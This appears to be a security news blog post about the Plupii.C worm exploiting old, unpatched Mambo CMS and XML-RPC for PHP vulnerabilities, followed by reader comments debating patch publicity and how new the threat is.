Plupii.C proved: Remarkable old Mambo CMS installations in use

Systems behind content management system based Web sites are not always patched. Delays when patching systems are not weeks. In fact, they are more than months.

The XML-RPC for PHP vulnerability from June 2005 is not the only security issue being exploited in this new Linux worm case. One of the other vulnerabilities is GLOBALS['mosConfig_absolute_path'] issue CVE -2005-0512, reported and fixed exactly one year ago. This code injection issue affects Mambo systems 4.5.2 and earlier.

At this time, Mambo defacemect reports from volunteers who helped the Internet Storm Center to make a conclusion that a new Plupii variant is spreading. Sometimes even the word ‘mambo’ in the URL helps confirming Mambo sites being as target of defacement; see new ones at etc.

A fixed Mambo version is available, but administrators simply didn’t patched their systems.

  • AK

    IMO the Mambo crew didn’t do nearly enough to publicize the security patch from last November. Then the 4.5.3 release came a week later, and the official announcement of that release made only vague references to “security enhancements” buried deeply in the second paragraph.

    I appreciate the Mambo crew’s timely announcement of the latest vulnerability on the new security mailing list (set up in mid-December). However, I can see how even conscientious admins could miss a single news posting made right before a USAnian holiday weekend.

  • Peter Sinclair

    If sites are running XML-RPC for PHP 1.1 when that was patched 8 months ago, and if Mambo users have not checked for updates any time in the past year, then I have no sympathy for anyone that might be exploited by this worm. The particular Mambo version that was vulnerable was update a year ago.

    I am not convinced there is any new threat. I heard that the guys at vnunet who first reported on this so-called Mambo vulnerability saw the old Secunia advisory and missed seeing that it was published on 2005-2-21. Cant blame them, its easy to see the February date and miss seeing the year.

    AK has a point about the Mambo announcement, but all releases of Mambo 4.x contain security enhancements – its a moving target to keep ahead of the script kiddies. The latest advisory at least saw a patch being issued immediately.

    I think the team here should be more careful about their sources of information tho – I mean, c’mon, telling people to update to a version that is a year old is just a little silly! Not as silly as not noticing the date on the Secunia advisory, but it comes a close second ;)

  • sunshine

    Look at the title: old – still in use